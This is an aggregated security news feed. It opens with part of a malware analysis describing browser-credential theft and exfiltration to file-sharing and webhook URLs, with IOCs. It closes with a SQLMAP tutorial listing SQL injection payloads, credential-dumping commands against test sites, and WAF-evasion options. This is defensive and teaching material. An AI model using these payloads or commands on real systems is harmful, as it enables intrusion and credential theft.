recursively searches for cookies.sqlite, key4.db, logins.json, and places.sqlite files inside the ""%appdata%\Roaming\Mozilla\Firefox\Profiles"" folder. It then copies these files to the ""data"" folder for staging before exfiltration. Figure 14 – Firefox browser data The script also collects information on installed applications and filenames from the victim’s Desktop, Documents, Downloads, Pictures, and Videos folders. These files are copied to the “%userprofile%\data” folder for staging, allowing the TA to analyze system contents and determine further exploitation opportunities. Figure 15 - Staged data for exfiltration Once all required information is collected, the PowerShell script compresses the ""%userprofile%\data"" folder into ""data.zip"" and uploads it to the file-sharing service “filesbin.net” using a custom URL. The bin name in ""hxxps://filebin.net/$binName/data.zip"" is a unique GUID, retrieved from the ""MachineGUID"" registry value located at:”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography” After uploading the data, the script sends a notification to the TA via webhookbin.net, using the URL ""hxxps://webhookbin.net/v1/bin/1cab2aa2-4984-4f1d-abb7-749611053a91"". This notification includes the Machine GUID, allowing the TA to identify the corresponding file upload URL and retrieve the victim’s exfiltrated data. Figure 16 – Exfiltration Finally, the exfiltrated data and staged folder are deleted to avoid the traces using the following commands Remove-Item $folderName -Recurse Remove-Item $zipPath We also discovered another GitHub repository, ""hxxps://github.com/coder9440/"", indicating that the TA is expanding its ongoing campaign. Initially targeting job-seeking developers, the campaign now includes an invoice-based attack while maintaining the same tactics, techniques, and procedures (TTPs). The repository hosts malicious LNK shortcuts (faktura_2025.pdf.lnk, faktura_586507.pdf.lnk) and a backdoor executable named ""SkyWatchWeather.exe,"" demonstrating the TA''s efforts to broaden its attack vectors. Figure 17 - TA''s GitHub Repo Conclusion This campaign demonstrates Threat Actor''s adaptability by leveraging social engineering tactics to deliver malware under the guise of recruitment challenges. By embedding malicious payloads within seemingly legitimate coding tasks, the attackers effectively deceive job-seeking developers. The use of social media platforms for command retrieval and staged exfiltration adds another layer of stealth, making detection more challenging. The recent shift from developer-focused lures to invoice-based attacks indicates an expansion in the TA’s target scope while maintaining their established techniques. This evolution underscores their persistent efforts to refine and diversify attack strategies, emphasizing the dynamic nature of modern cyber threats. Cyble’s innovative threat intelligence platforms, Cyble Vision and Cyble Hawk, leverage AI-driven analytics and proactive security strategies to help organizations identify, investigate, and counter these and other evolving cyber threats. By delivering real-time insights, these solutions enhance defenses against targeted attacks like the FizzBuzz recruitment scam, strengthening overall cybersecurity resilience. Yara and Sigma rules [1],[2] to detect this operation can be downloaded from the linked GitHub repository.    Recommendations Always cross-check job offers and coding challenges from unverified sources, especially those shared via social media, job forums, or direct messages. Refrain from downloading and running files from unknown repositories, particularly ISO images and script files. Legitimate hiring assessments do not require executing system-level scripts.  Implement policies to restrict the execution of PowerShell, JavaScript, and other scripting languages unless explicitly required. Use application whitelisting to prevent unauthorized execution. Keep an eye on outbound connections to uncommon domains or file-sharing services (e.g., catbox.moe, webhookbin.net) that could indicate data exfiltration attempts. Deploy advanced endpoint detection and response (EDR) solutions to identify suspicious behavior, such as unauthorized script execution, scheduled task creation, or browser data access. Protect browser-stored credentials by enabling multi-factor authentication (MFA) and using password managers instead of storing sensitive information in browsers. Educate employees and developers about the risks of social engineering attacks disguised as job opportunities or business-related communications. Keep software, browsers, and security tools up to date to minimize the risk of exploitation through known vulnerabilities. MITRE ATT&CK® Techniques Tactic Technique Procedure Initial Access (TA0001) Spearphishing Attachment (T1566.001) The attacker delivers a malicious ISO file disguised as a recruitment task through GitHub. Execution (TA0002) User Execution (T1204) The user opens README.lnk, launching a malicious PowerShell script. Execution (TA0002) Command and Scripting Interpreter: PowerShell (T1059.001) LNK file downloads and executes the malicious PowerShell file Execution (TA0002) System Binary Proxy Execution: Mshta (T1218.005) mshta.exe executes malicious PowerShell commands. Persistence (TA0003) Scheduled Task/Job (T1053.005) A scheduled task, ""Weather Widget"", ensures persistence. Credential Access (TA0006) OS Credential Dumping (T1003) The script attempts to extract Wi-Fi credentials Credential Access (TA0006) Steal Web Session Cookie (T1539) PowerShell script steals Chrome cookies via remote debugging and Firefox browser-related user files. Discovery (TA0007) System Information Discovery (T1082) PowerShell script collected system information and installed applications list. Collection (TA0009) Data from Local System (T1005) PowerShell script collected Wi-Fi passwords, browser cookies, and file system data. Collection (TA0009) Archive Collected Data (T1560) Stolen data is compressed into data.zip before exfiltration. Exfiltration (TA0010) Exfiltration Over Web Service (T1567.002) Stolen data is uploaded to filebin.net for exfiltration Command and Control (TA0011) Web Service: Dead Drop Resolver (T1102.001) FogDoor retrieves commands to execute from a social media profile Command and Control (TA0011) Application Layer Protocol: Web Protocols (T1071.001) The script communicates with WebhookBin for data exfiltration tracking. Indicators Of Compromise (IOCs) Indicator Type of Indicator Description 82b649ae0a4cfe37c2a32ec2010bf7ef0e3236b540f85c8fbf15657d48d30d84 SHA-256 faktura_586507.pdf.lnk 8e565ba45c7624e8bc5dd92c1d0d3710f6a2b21d6c94742bb51fec07b4843ebd SHA-256 Zadanie%20rekrutacyjne.iso 2b4bc80af0a0afac04da73e7da2779d3ab3ed8c460d2fb22d4034e1b2469f879 SHA-256 README.lnk 33bc5fa9798219ba6d4e31f91ec23982596c409e0fd73e2c0c33c70538b7ec83 SHA-256 eduway.ps1 hxxps://litter.catbox.moe/eduway.ps1 URL ps1 download URL hxxps://raw.githubusercontent.com/coder9540/weather_widget/refs/heads/main/SkyWatchWeather.exe URL SkyWatchWeather.exe hxxps://raw.githubusercontent.com/coder9440/drop2/refs/heads/main/faktura_586507.pdf.lnk URL ITW URL for LNK file hxxps://github.com/Rekrutacja-JS/FizzBuzz URL GitHub repository The post FizzBuzz to FogDoor: Targeted Malware Campaign Exploits Job-Seeking Developers appeared first on Cyble.

by CYBLE

South Africa-listed poultry producer Astral Foods (ARLJ.J) has reported a cybersecurity incident that disrupted its operations and is expected to affect its profits by approximately 20 million rand ($1.10 million) for the six months ending March 31, 2025. The company announced the incident on Monday, stating that it had taken action to mitigate the impact and restore operations. Astral Foods confirmed that the cybersecurity incident occurred on March 16, 2025, leading to downtime in its poultry processing division. The disruption delayed processing and deliveries, affecting revenue generation. Although the company swiftly implemented disaster recovery protocols, the temporary halt in operations resulted in financial losses. The company stated, “On March 16, 2025, Astral experienced a cybersecurity incident. The Group acted swiftly, implementing all disaster recovery protocols and preparedness plans. However, our Poultry Division was negatively impacted by downtime in processing and deliveries to customers. This resulted in a loss of revenue, and together with costs to catch up on a backlog in production, have impacted the Group’s profits in this reporting period by approximately R20 million.” By the time of the announcement, Astral Foods confirmed that all business units were operating normally, and its systems had fully recovered. The company assured stakeholders that no confidential or sensitive data related to customers, suppliers, or individuals had been compromised. Profit Decline Forecasted at 60% Due to Astral Foods Cyberattack In addition to the cybersecurity incident, Astral Foods expects a significant decline in profits for the first half of the fiscal year. The company forecasts a drop of up to 60% in its half-year profit due to multiple challenges, including the Astral Foods cyberattack, lower poultry prices, and increased production costs. Astral projects its headline earnings to be around 354 cents per share for the first half of the fiscal year. The poultry industry has faced economic pressure due to constrained consumer spending and rising input costs, particularly feed costs that have surged following last year’s drought. Challenges Facing the Poultry Industry The poultry sector in South Africa has been experiencing tough conditions due to: Lower Chicken Prices: A drop in poultry prices due to reduced consumer spending has affected revenue generation. High Input Costs: The costs of feed and production have increased, particularly due to supply chain challenges and climate conditions. Operational Setbacks: The cybersecurity incident exacerbated existing financial pressures, disrupting production and causing additional recovery expenses. Recovery and Assurance to Stakeholders Astral Foods emphasized that its cybersecurity response was effective in mitigating further risks and preventing data breaches. The company expressed its gratitude to its customers, employees, and service providers for their ongoing support during the recovery period. “We would like to sincerely thank our customers, staff, and service providers for their unwavering support,” Astral stated in its announcement. With all business units now operating normally, the company is focused on maintaining stability and improving performance in the coming months. Future Outlook As Astral Foods moves forward, the company aims to strengthen its cybersecurity measures to prevent future incidents. It also continues to navigate economic challenges by optimizing operations, managing costs, and ensuring a resilient supply chain. While the first half of the fiscal year has been impacted, the company remains optimistic about long-term recovery and growth. Astral Foods’s rapid response and recovery efforts prevented further damage, but the financial impact remains significant. With all business units back to normal operations, Astral Foods now focuses on overcoming market challenges and reinforcing its security framework to safeguard future operations. As businesses increasingly rely on digital infrastructure, cybersecurity resilience remains a top priority. The poultry producer’s experience underscores the critical need for proactive measures in safeguarding business continuity against evolving cyber threats.

by The Cyber Express

Attack attempts via CVE-2025-24813 are underway, but successful attacks require specific, non-default configurations, according to GreyNoise.

by Cybersecurity Dive

Disable or Modify Cloud Logsis a defense evasion technique that adversaries use to manipulate cloud logging services to evade detection and obscure their activities. Cloud environments rely on logging solutions like AWS CloudTrail, Azure Monitor, and Google Cloud Logging to track system events, user actions, and security incidents. These logs are critical for threat detection, incident response, and forensic investigations. By disabling, modifying, or deleting cloud logs, attackers can cover their tracks, making it difficult for security teams to identify unauthorized access, privilege escalation, or data exfiltration.

by Picus Security

NetSfere Integrates ML-KEM and AES into its text, voice and video messaging platform to meet 2027 NSA Quantum Security mandates. The post NetSfere Launches Quantum-Resilient Messaging Platform for Enterprise and Government Use appeared first on SecurityWeek.

by SecurityWeek

Paris, France, 24th March 2025, CyberNewsWire

by Hackread

A threat actor posted data on BreachForums from an alleged supply chain attack that affected more than 140K tenants, claiming to have compromised the cloud via a zero-day flaw in WebLogic, researchers say.

by Dark Reading

New versions of the Albabat ransomware target Windows, Linux, and macOS, and retrieve configuration files from GitHub. The post Albabat Ransomware Expands Targets, Abuses GitHub appeared first on SecurityWeek.

by SecurityWeek

Reuters reports that widely known cryptocurrency mixing service Tornado Cash had sanctions imposed by the Biden administration over its involvement in the laundering of over $7 billion for North Korean hackers and other cyber threat actors repealed by the U.S.

by SC Media

More than a million households, primarily in Russia, had their credentials, logs, network configurations, and other sensitive details leaked following the compromise of network equipment vendor Keenetic''s Mobile App database, Cybernews reports.

by SC Media

The Cloak ransomware operation has laid claim on a significant cyberattack against the Virginia Attorney General''s Office last month, reports SecurityWeek.

by SC Media

Threat actors have abused the vulnerable vsdatant.sys kernel-level driver within the Check Point ZoneAlarm antivirus version released in 2016 to exfiltrate account credentials as part of a Bring Your Own Vulnerable Driver attack, according to Hackread.

by SC Media

Malware executables are being increasingly code-signed with three-day certificates using the Microsoft Trusted Signing service as threat actors seek to establish legitimacy and prevent thwarting by security systems, according to BleepingComputer.

by SC Media

by ComputerWeekly

Russia is having its government- and privately-controlled organizations targeted by the Head Mare and Twelve hacktivist operations in new joint intrusions, with the former previously found to have used tools and command-and-control servers linked to Twelve, The Hacker News reports.

by SC Media

Acronis Threat Research found 2M+ malicious URLs & 5,000+ malware instances in Microsoft 365 backup data—demonstrating how built-in security isn''t always enough. Don''t let threats persist in your cloud data. Strengthen your defenses. [...]

by BleepingComputer

by ComputerWeekly

iProov launched iProov Workforce MFA. This device-independent, FIDO Alliance-certified, biometric authentication solution helps organizations mitigate the risk of one of workforce security’s most crucial concerns: account takeover. Using biometric authentication as part of an MFA process adds an irrefutable layer of identity confirmation to help organizations prevent significant financial losses, reputational damage, and operational disruptions. The solution can be used in conjunction with passkeys, or independently of the device, enabling it to run on users’ … More → The post iProov Workforce MFA mitigates risk of account takeovers appeared first on Help Net Security.

by Help Net Security

Security researchers have uncovered a pre-installed, undocumented remote access tunnel in Unitree Go1 robot dogs, enabling full remote control and potential lateral network access. The discovery raises serious concerns about supply chain trust, especially as these robots are widely used in academic, corporate, and even defense-related environments. Unitree Robotics, a Chinese company known for producing … The post Remote Access Backdoor Discovered in Chinese Robot Dog Unitree Go1 appeared first on CyberInsider.

by Cyber Insider

Public officials and private citizens are consistently warned about hacking and data leaks, but technologies designed to increase privacy often decrease government transparency. The post Encrypted Messaging Apps Promise Privacy. Government Transparency Is Often the Price appeared first on SecurityWeek.

by SecurityWeek

Flexera''s 2025 State of the Cloud report reveals cloud cost challenges reign supreme as FinOps adoption rises and AI usage soars, with minimal workload repatriation.

by ITPro Today

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to make the shift from vulnerability management to exposure management. In this blog, Tenable Senior Staff Information Security Engineer Arnie Cabral, who is leading the company''s internal exposure management journey, shares his experiences. You can read the entire Exposure Management Academy series here.  In my role as an information security engineer at Tenable, I am directly involved in transitioning our own security infrastructure from traditional vulnerability management to a more proactive exposure management approach. The first steps required strategic planning, policy realignment and resource allocation.The need to move beyond simply identifying vulnerabilities drove Tenable’s transition. We needed to focus on managing real-world exposures that pose significant risk to our security posture.The starting point: Recognizing the need for changeThey say a journey of a thousand miles begins with a single step. At Tenable, our shift to exposure management in our internal infrastructure began with a simple realization. We knew that, although it is critical to modern cybersecurity, vulnerability management alone doesn’t provide a complete picture of cyber risk. Traditional vulnerability management typically involves scanning assets for known vulnerabilities and remediating them based on severity scores. However, true security risk management requires a broader view that includes misconfigurations, attack surface visibility and real-time threat intelligence.To start our move to cyber exposure management, we reframed our existing policies to align with the new approach. This was not just a simple editing exercise, although there was some carry-over from the current policies. Instead, we redefined our objectives and transformed our policies to ensure alignment with emerging risk-based exposure management frameworks.Establishing a policy frameworkWith our new exposure management policy in place, we created a foundation to ensure our security teams have clear guidelines on how to assess, prioritize and remediate exposures beyond just addressing common vulnerabilities and exposures (CVEs).As we completed the policy, we understood the new approach would need to incorporate:A broader vulnerability assessment of risk, beyond the Common Vulnerability Scoring System (CVSS) scoresVulnerability prioritization frameworks that account for asset criticality, attack paths and real-world exploitabilityThe integration of multiple security tools to gain comprehensive visibility for more actionable attack surface managementAlignment with a broader set of stakeholders to match the expanded scope of assets and detectionsBuilding a project planAlongside the policy we developed, our team drafted a project plan to operationalize security exposure management. This plan included:Identifying gaps between the existing risk-based vulnerability management program and the desired state of the exposure management programMapping inputs (i.e., the sources of vulnerability and exposure data) and outputs (i.e., the teams responsible for remediation)Defining key milestones and deliverablesAssigning responsibilities and estimating resource needsSmaller organizations could manage this process with common tools like spreadsheets. But larger enterprises, like ours, usually turn to platforms like Jira and Confluence to help the process. Of course, no plan would be complete without Gantt charts that provide a visual understanding of the project structure and timeline. My advice is to use tools that help you reach your goals without adding unnecessary process overhead. For example, a platform that integrates data from multiple siloed security tools from multiple vendors gives you a continuous and complete view of your environment and an accurate risk profile. Addressing operational challengesOne of the key challenges in this transition was the complexity of security operations. Traditional vulnerability management mostly relies on vulnerability scanning assets with Nessus scanners and agents, but the move to exposure management required incorporating other elements, including:Cloud environments and ephemeral assetsConfiguration management across various asset types (i.e., SaaS, PaaS, IaaS and hardware) as well as identity exposure risksApplication security and software development lifecycle (SDLC) vulnerabilitiesThird-party security risksOur teams had to ensure remediation workflows could handle this broader scope while maintaining efficiency. This led to discussions about automation and orchestration — essentially, we wanted to understand how we could centralize the triage and response process without overloading security teams.How to implement an exposure management programIf your organization is embarking on, or considering starting, your own exposure management journey, here are exposure management best practices and key takeaways from Tenable’s experience:Don’t neglect traditional vulnerability management: Continuous threat exposure management expands the scope but does not replace foundational vulnerability management practices. CVE-based remediation remains a critical component.Start with policy and governance: Establish a clear exposure management policy to provide structure, establish service level agreements (SLAs) and ensure accountability. Align teams: Organize teams and resources to ensure they’re working in support of your exposure management policy.Prioritize based on real-world risk: Not all vulnerabilities pose immediate threats. Focus on threat exposures that present actual risk based on attack feasibility.Optimize workflows for scale: Exposure management introduces a higher volume of security issues. Automation and orchestration are essential.Expect a continuous evolution: Exposure management is not a one-time project but an ongoing program that adapts to new threat detection and business changes.TakeawaysThe transition from vulnerability management to exposure management is a necessary evolution in cybersecurity strategy. As attack surfaces expand and threats become more sophisticated, your organization needs to adopt a more holistic approach to cyber risk reduction. Although the journey can be complex and resource-intensive, the benefits — increased visibility, better risk prioritization and improved security outcomes — make it a worthwhile investment. I’m excited about what lies ahead and look forward to sharing more about our journey.

by Tenable

A list of topics we covered in the week of March 17 to March 23 of 2025

by Malwarebytes Labs

The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. The FBI warns that threat actors use malicious online document converters to steal users’ sensitive information and infect their systems with malware. “The FBI Denver Field Office is warning that agents are increasingly seeing a scam […]

by Security Affairs

Europol has released its 2025 report on serious and organized crime in the EU. The EU Serious and Organised Crime Threat Assessment (EU-SOCTA) is based on intelligence from EU countries and global law enforcement. The findings are stark. Organized crime is becoming more complex and harmful, with deeper roots across Europe. Organized crime is changing fast The structure of organized crime is shifting. Groups are no longer tied to old ways of working. They’ve adapted … More → The post How AI, corruption and digital tools fuel Europe’s criminal underworld appeared first on Help Net Security.

by Help Net Security

The Cloak ransomware group claims responsibility for a cyberattack on the Virginia Attorney General’s Office that occurred in February. The ransomware group Cloak has claimed responsibility for a February cyberattack on the Virginia Attorney General Office. A cyberattack on the Virginia Attorney General’s Office forced officials to shut down IT systems, including email and VPN, […]

by Security Affairs

The European Union’s landscape of serious and organized crime is undergoing a significant transformation, according to the latest EU-SOCTA 2025 report released by Europol. This comprehensive assessment highlights how hybrid threats and artificial intelligence (AI) have become the core elements of the organized threat landscape in Europe, reshaping the tactics, tools, and strategies employed by criminal organizations.  EU-SOCTA 2025: The Growing Complexity of Organized Crime  Europol’s EU-SOCTA 2025 report presents a deep dive into the emerging and intensifying threat of organized crime within the EU. The document highlights the rapidly increasing convergence of cybercriminal activities, hybrid threats, and the exploitation of new technologies, making traditional crime-fighting approaches more obsolete than ever.  “Criminals are leveraging cutting-edge technology to expand their reach and evade detection,” states Europol’s Director, Catherine De Bolle. “This trend is pushing us to rethink how we approach both traditional and cybercrime.”  As organized crime becomes increasingly embedded in the digital realm, its scope and impact reach beyond the traditional boundaries of criminal law enforcement. The EU-SOCTA 2025 highlights the urgency for proactive measures to counter these expanding threats, which include cyberattacks, AI-driven fraud, and the weaponization of digital technologies by criminal groups.  Hybrid Threats: The New Face of Crime  One of the most alarming aspects highlighted in the EU-SOCTA 2025 is the rise of hybrid threats, where criminal tactics merge with elements of state-sponsored activities, creating a volatile environment. These hybrid threats destabilize societies, exploit critical infrastructures, and often blur the lines between conventional crime and geopolitical conflict.  “The DNA of organized crime is mutating,” says Cheyvoryea Gibson, Special Agent in Charge of the FBI’s Detroit Field Office. “Criminal networks are increasingly acting as proxies for hybrid threat actors, using digital tools to advance their agendas with little regard for national borders.”  Europol’s assessment stresses that hybrid threats represent a critical vulnerability for EU Member States, as criminal groups partner with hostile actors to advance their own agendas. This synergy between criminal organizations and geopolitical conflicts has created an unpredictable and dangerous security environment.  AI and New Technologies: Accelerating the Threats  Artificial intelligence and emerging technologies are not only reshaping the operational capabilities of organized crime but are also enabling criminals to streamline and scale their activities. From ransomware attacks to the exploitation of AI for social engineering, these technologies allow criminal networks to automate operations, making them more efficient and harder to trace.  “AI is revolutionizing the organized crime landscape,” the EU-SOCTA 2025 report notes. “Criminal groups are using these tools to create sophisticated fraud schemes, bypass traditional detection methods, and even generate malicious content, such as deepfakes or child sexual abuse material.”  The EU-SOCTA 2025 identifies several key areas where AI is driving criminal innovation. This includes the use of AI for large-scale online fraud, cyberattacks, and even in the smuggling of migrants, where criminals exploit AI to create fake identities and cover their tracks in digital spaces.  The Fast-Growing Threats in the Organized Crime Landscape  According to the EU-SOCTA 2025, criminal activities in Europe are diversifying, becoming more complex and harder to manage. The report identifies several growing threats that are accelerated by the intersection of digital platforms and AI, including:  Cyberattacks: Ransomware attacks are evolving, now increasingly targeting critical infrastructures, governments, businesses, and individuals with potentially state-aligned objectives.  Online fraud schemes: AI-powered social engineering is now driving large-scale fraud, exploiting stolen data and personal information to deceive victims.  Migrant smuggling: Criminal networks are leveraging hybrid threat tactics, showing disregard for human dignity while capitalizing on geopolitical crises.  Drug trafficking: New routes and methods are emerging, often facilitated by AI and digital platforms that enable criminal groups to evade law enforcement.  Firearms trafficking: The online marketplace for weapons is growing, with technological advancements allowing easier access and trade of illegal firearms.  Waste crime: A less discussed but highly profitable sector, where criminal networks exploit businesses for illicit environmental damage.  Each of these threats is enhanced by the hybrid threat environment, where organized crime increasingly collaborates with actors seeking to destabilize Europe.  Conclusion  The EU-SOCTA 2025 report highlights the urgent need for a unified response to organized crime, emphasizing the interconnected nature of digital fraud, hybrid threats, and new technologies. Criminal organizations are adapting rapidly, utilizing technologies like blockchain and cryptocurrencies to launder money and infiltrate legitimate sectors.   To effectively these cyber threats, law enforcement across Europe must adjust their strategies to target both the criminal markets and the technological tools that sustain them.

by The Cyber Express

Matthew Weiss, the former Co-Offensive Coordinator and Quarterbacks Coach at the University of Michigan, has been indicted on serious charges related to unauthorized access to computers and aggravated identity theft.   Weiss, aged 42 and a resident of Ann Arbor, Michigan, faces a 24-count indictment that includes 14 counts of unauthorized access to computers and 10 counts of aggravated identity theft. The indictment was announced by Acting U.S. Attorney Julie A. Beck, with support from Cheyvoryea Gibson, Special Agent in Charge of the FBI Detroit Field Office.  Unauthorized Access to Student-athlete Databases  The charges stem from Weiss’s alleged activities between 2015 and January 2023, during which time he is accused of illegally accessing confidential data stored by a third-party vendor managing student-athlete databases for over 100 colleges and universities. Through these unauthorized means, Weiss is believed to have accessed and downloaded sensitive personal information and medical records of over 150,000 athletes.  In addition to the unauthorized access of student data, the indictment reveals that Weiss used the obtained information, combined with his own internet research, to infiltrate the online accounts of more than 2,000 student-athletes. His activities also extended to an additional 1,300 students and alumni from various universities across the United States. These accounts included social media, email, and cloud storage platforms. Weiss is accused of downloading private and intimate photos and videos from these accounts—content that was never meant to be publicly shared.  Acting U.S. Attorney Julie A. Beck emphasized the seriousness of the charges, stating, “Our office will move aggressively to prosecute computer hacking to protect the private accounts of our citizens. We stand ready with our law enforcement partners to bring those who illegally invade the privacy of others to justice.” Details into the Investigations  FBI Special Agent Cheyvoryea Gibson echoed these sentiments, highlighting the extensive investigative efforts involved in the case. “Today’s indictment of Matthew Weiss underscores the commitment and meticulous investigative efforts of our law enforcement professionals,” said Gibson. “The FBI Detroit Cyber Task Force, in close collaboration with the University of Michigan Police Department, worked relentlessly on this case to safeguard and protect our community.”  If convicted on all counts, Weiss faces a maximum penalty of five years in prison for each count of unauthorized access to computers. Additionally, each count of aggravated identity theft carries a potential penalty of two years in prison. Notably, a conviction for aggravated identity theft mandates a two-year mandatory minimum sentence, which must be served consecutively to any other sentence imposed for the underlying charges.  Conclusion The case is still in its early stages, and Weiss, like any defendant, is entitled to the presumption of innocence unless proven guilty beyond a reasonable doubt. However, the indictment presents a disturbing picture of the misuse of technology and the violation of individuals’ privacy. This case serves as a reminder of the risks associated with unauthorized access to personal data and the potential for identity theft, which can have long-lasting consequences for victims.  The prosecution of Weiss is being led by Assistant U.S. Attorneys Timothy Wyse and Patrick Corbett, with the investigation being conducted by the Federal Bureau of Investigation. The case will continue to unfold, and authorities are likely to pursue further action to ensure that those responsible for identity theft and unauthorized access to personal data are held accountable.

by The Cyber Express

New browser tracking threats and how to counter them.

by Kaspersky

Free Article LinkContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Learn how to exploit SQL injection vulnerabilities using SQLMAP, an automated penetration testing tool for database security assessment.IntroductionSQL Injection remains one of the most critical vulnerabilities in web applications, allowing attackers to manipulate backend databases. SQLMAP, an advanced penetration testing tool, automates the exploitation process, making database enumeration and extraction effortless. This guide will walk you through SQL Injection, its types, and SQLMAP’s powerful capabilities with real-world examples on test environments like TestVulnHub and DVWA.SQL Injection Image generated by the AuthorIndexWhat is SQL Injection?SQL Injection Basics (with practical commands)SQL Injection TypesSQLMAP GuideBasics about SQLMAPSQLMAP Command Reference TablePractical SQLMAP Commands (TestVulnHub)Practical SQLMAP Commands with Cookies (DVWA)What is SQL Injection?SQL Injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries a web application makes to its database. By injecting malicious SQL statements, an attacker can view, modify, or delete data and even gain administrative access.SQL Injection Basics (with Practical Commands)A basic SQL Injection attack involves injecting SQL queries via an application’s input fields. Below are common payloads used to test for SQL Injection:1. Authentication Bypass:This payload bypasses authentication mechanisms by always returning a true condition.'' OR 1=1 --2. Identifying Number of Columns:This helps identify how many columns exist in a database.'' ORDER BY 3 --3. Extracting Database Version:This retrieves the database version information.'' UNION SELECT NULL, @@version, NULL --4. Retrieving Current Database:This extracts the name of the current database in use.'' UNION SELECT NULL, database(), NULL --5. Listing Usernames from a Table:This retrieves stored usernames and passwords (if available in plaintext).'' UNION SELECT NULL, username, password FROM users --6. Checking Database Users:This retrieves the database users.'' UNION SELECT NULL, user FROM mysql.user --7. Extracting Table Names:This helps in enumerating available tables in the database.'' UNION SELECT NULL, table_name FROM information_schema.tables --8. Extracting Column Names:This reveals column names of a specific table.'' UNION SELECT column_name FROM information_schema.columns WHERE table_name=''users'' --9. Extracting Data from a Specific Column:This extracts usernames from the ‘users’ table.'' UNION SELECT username FROM users --SQL Injection TypesIn-band SQLi (Classic) — Uses the same communication channel to perform the attack and retrieve results. This includes Error-Based and Union-Based SQLi.Inferential SQLi (Blind) — No direct database response; attacker infers information based on application behavior. This includes Boolean-Based and Time-Based SQLi.Out-of-band SQLi — Uses different channels (like DNS or HTTP requests) to exfiltrate data when in-band methods are unavailable.Error-Based SQLi — Extracts information through error messages.Union-Based SQLi — Uses the UNION SQL operator to combine results.Boolean-Based SQLi — Determines responses based on true/false conditions.Time-Based SQLi — Uses time delays to infer database responses.SQLMAP Guide:SQLMAP Basics:SQLMAP is an open-source penetration testing tool that automates SQL Injection detection and exploitation. It supports multiple injection techniques and database management systems (DBMS), including MySQL, PostgreSQL, and MSSQL.SQLMAP Command Reference Table:SQLMAP CommandsSQLMAP Test Case 1 {Basic} (TestVulnHub)Below are practical SQLMAP commands executed on testphp.vulnweb.com:1. Enumerate databasesThis command retrieves the names of all databases available on the target system.sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 --dbsFrom the Screenshot, we can see the database names as acuart and information_schema.2. Enumerate tables from a specific databaseThis command lists all tables within the database acuart.sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart --tablesFrom the Screenshot, we can see the various table names.3. Enumerate columns from a specific tableThis command retrieves the column names from the users table in the acuart database.sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users --columnsFrom the Screenshot, we can see the various Column names.4. Dump specific user data (username & password) from a tableThis command extracts and displays usernames and passwords from the users table.sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C uname,pass --dumpFrom the Screenshot, we can see the the desired infomation.SQLMAP Test Case 2 {Intermediate — Cookies} (DVWA)Below are SQLMAP commands executed on DVWA using session cookies:Cookies can be easily accessed via Right Click > Inspect > Storage > Cookies as shown in the Screenshot.DVWA Cookies1. Enumerate databasesThis command retrieves all available databases while using an authenticated session.sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" --dbs2. Enumerate tables from a specific databaseThis command lists all tables in the dvwa database.sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa --tables3. Enumerate columns from a specific table:This command displays column names in the users table of the dvwa database.sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users --columns4. Dump specific user data (user ID & password) from a tableThis command retrieves and displays user IDs and password hashes from the users table.sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users -C user_id,password --dumpSQLMAP Test Case 3 {Advanced} (Bypassing WAFs with SQLMAP)Web Application Firewalls (WAFs) are designed to block SQL Injection attempts. However, SQLMAP offers various evasion techniques to bypass WAF protections.1. Tamper Scripts:SQLMAP includes multiple tamper scripts to obfuscate SQL payloads. Some useful ones include:sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment,randomcaseCommon tamper scripts:space2comment: Converts spaces to inline comments (/**/)randomcase: Randomizes uppercase/lowercase lettersbetween: Replaces equal (=) signs with BETWEEN2. Using Hex Encoding:This encodes payloads in hexadecimal to evade signature-based detection.sqlmap -u "http://target.com/vuln.php?id=1" --hex3. Changing User-Agent and Referer Headers:This helps avoid WAFs that block automated scanners.sqlmap -u "http://target.com/vuln.php?id=1" --user-agent="Mozilla/5.0" --referer="http://google.com"4. Custom Injection Points:Using * as a wildcard helps SQLMAP inject payloads at different points.sqlmap -u "http://target.com/vuln.php?id=1*" --dbsConclusionSQLMAP is an essential tool for security professionals and penetration testers, enabling efficient exploitation of SQL Injection vulnerabilities. Understanding its commands and capabilities ensures thorough database security assessments. Always test in legal environments and use SQLMAP responsibly to strengthen cybersecurity defenses.Happy Hacking! 🔥SQL Injection Exploitation Made Easy: A Practical Guide to SQLMAP was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Learn about symbolic links, their uses, soft links, hard links, and dead links, among other topics…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

AI/ML tool usage surged globally in 2024, with enterprises integrating AI into operations and employees embedding it in daily workflows, according to Zscaler. The report reveals a 3,000+% year-over-year growth in enterprise use of AI/ML tools, highlighting the rapid adoption of AI technologies across industries to unlock new levels of productivity, efficiency, and innovation. Findings are based on analysis of 536.5 billion total AI and ML transactions in the Zscaler cloud from February 2024 to … More → The post Enterprises walk a tightrope between AI innovation and security appeared first on Help Net Security.

by Help Net Security

As the region continues with its ambitious road map, cybersecurity must be woven into every step of the process.

by Dark Reading

Companies in the EU are starting to look for ways to ditch Amazon, Google, and Microsoft cloud services amid fears of rising security risks from the US. But cutting ties won’t be easy.

by WIRED Security News

